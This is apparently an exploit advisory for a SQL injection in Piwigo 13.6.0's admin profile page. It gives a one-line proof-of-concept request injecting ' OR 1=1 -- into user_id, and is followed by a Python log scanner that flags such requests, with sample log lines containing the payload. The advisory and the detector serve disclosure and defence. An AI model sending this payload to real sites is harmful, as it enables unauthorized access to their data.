# Exploit Title: Piwigo 13.6.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/Piwigo/Piwigo
# Software Link: https://github.com/Piwigo/Piwigo
# Version: 13.6.0
# Tested on: Windows
# CVE : CVE-2023-33362

Proof Of Concept:
GET /admin.php?page=profile&user_id=' OR 1=1 -- HTTP/1.1
Host: piwigo

Steps to Reproduce
Log in as an admin user.
Send the request.
Observe the result.
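
Added example (not part of the original advisory and not Piwigo code): a web access log check for the request shown above, flagging admin.php?page=profile requests whose user_id is not a plain integer. The combined log format, the sample lines, the function names and the rule that a legitimate user_id is numeric are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [25/Nov/2025:10:01:02 +0000] "GET /admin.php?page=profile&user_id=2 HTTP/1.1" 200 5120
10.0.0.9 - - [25/Nov/2025:10:03:17 +0000] "GET /admin.php?page=profile&user_id=%27%20OR%201%3D1%20-- HTTP/1.1" 200 9811
10.0.0.9 - - [25/Nov/2025:10:03:40 +0000] "GET /admin.php?page=profile&user_id=' OR 1=1 -- HTTP/1.1" 200 9811
10.0.0.7 - - [25/Nov/2025:10:04:00 +0000] "GET /admin.php?page=history&user_id=abc HTTP/1.1" 200 300
10.0.0.7 - - [25/Nov/2025:10:05:00 +0000] "GET /index.php?/category/1 HTTP/1.1" 200 700
"""

# Greedy target so a request line containing raw spaces still parses.
LINE_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>.*) '
    r'HTTP/\d\.\d" (?P<status>\d{3})'
)
# Assumption: a legitimate user_id is a short decimal integer.
NUMERIC_ID = re.compile(r"\d{1,10}")


def check_line(line):
    """Return a finding dict for a non-numeric user_id on the profile page, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/admin.php"):
        return None
    # parse_qs percent-decodes, so encoded and raw payloads compare equal.
    params = parse_qs(url.query, keep_blank_values=True)
    if "profile" not in params.get("page", []):
        return None
    bad = [v for v in params.get("user_id", []) if not NUMERIC_ID.fullmatch(v)]
    if not bad:
        return None
    return {"client": m.group("client"), "user_id": bad[0],
            "status": int(m.group("status"))}


def scan(log_text):
    """Check every line of an access log and collect the findings."""
    return [f for f in map(check_line, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged line only shows that the request was served; whether the query was altered has to be confirmed from application or database logs.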